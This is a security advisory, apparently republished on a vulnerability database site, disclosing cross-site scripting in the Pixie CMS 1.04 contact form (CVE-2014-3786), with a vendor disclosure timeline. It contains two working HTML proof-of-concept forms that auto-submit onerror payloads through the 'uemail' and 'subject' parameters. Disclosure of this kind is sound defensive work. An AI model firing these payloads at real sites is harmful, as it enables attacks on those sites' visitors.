Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Pixie CMS 1.04 Cross Site Scripting

Related Vulnerabilities: CVE-2014-3786  
Publish Date: 30 May 2014
Author: Simone Memoli, Filippos Mastrogiannis
Source 
                							

                Pixie CMS v1.04 (Contact form) POST XSS Vulnerabilities

Vendor: Pixie CMS
Product web page: http://www.getpixie.co.uk
Affected version: 1.04
Severity: Medium
CVE: CVE-2014-3786
Demo page: http://demo.getpixie.co.uk

Discovered by: Filippos Mastrogiannis (@filipposmastro)
         & Simone Memoli (@Simon90_Italy)

Pixie is a free, open source CMS software a.k.a a small, simple, 
website maker (as the vendor states on its website)

Description: Pixie (v1.04) suffers from several POST XSS vulnerabilities in
the Contact form (contact.php). The user input through the POST parameters 
'uemail' and 'subject' are not properly sanitized allowing the attacker to 
execute HTML code into user's browser session on the affected site.

The vulnerable component is the contact module of the Pixie v1.04 and it 
can be found at (/pixie_v1.04/admin/modules/contact.php) of the source code

Tested on: Ubuntu 13.10 with Mozilla Firefox 29.0 / Microsoft Windows 7
with Mozilla Firefox 29.0.1

Proof Of Concept:

<html>
<title>Pixie CMS v1.04 Contact form (uemail parameter) XSS</title>
<form name="xss" action="http://demo.getpixie.co.uk/contact/" method="post">
<input type="hidden" name='uemail' value='"><img src=x onerror=prompt(document.domain);>'>
<input type="hidden" name='contact' value='1'>
<input type="hidden" name='subject' value='xss'>
</form>
<script>document.xss.submit();</script>
</html>

<html>
<title>Pixie CMS v1.04 Contact form (subject parameter) XSS</title>
<form name="xss" action="http://demo.getpixie.co.uk/contact/" method="post">
<input type="hidden" name='uemail' value='xss'>
<input type="hidden" name='contact' value='1'>
<input type="hidden" name='subject' value='"><img src=x onerror=prompt(document.location);>'>
</form>
<script>document.xss.submit();</script>
</html>


Disclosure Timeline:
 
[13.05.2014] Vulnerabilities discovered.
[13.05.2014] Initial contact with the vendor.
[15.05.2014] 1st response from the official maintainer.
[30.05.2014] 2nd response from the official maintainer.
[30.05.2014] Public security advisory released.
 
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started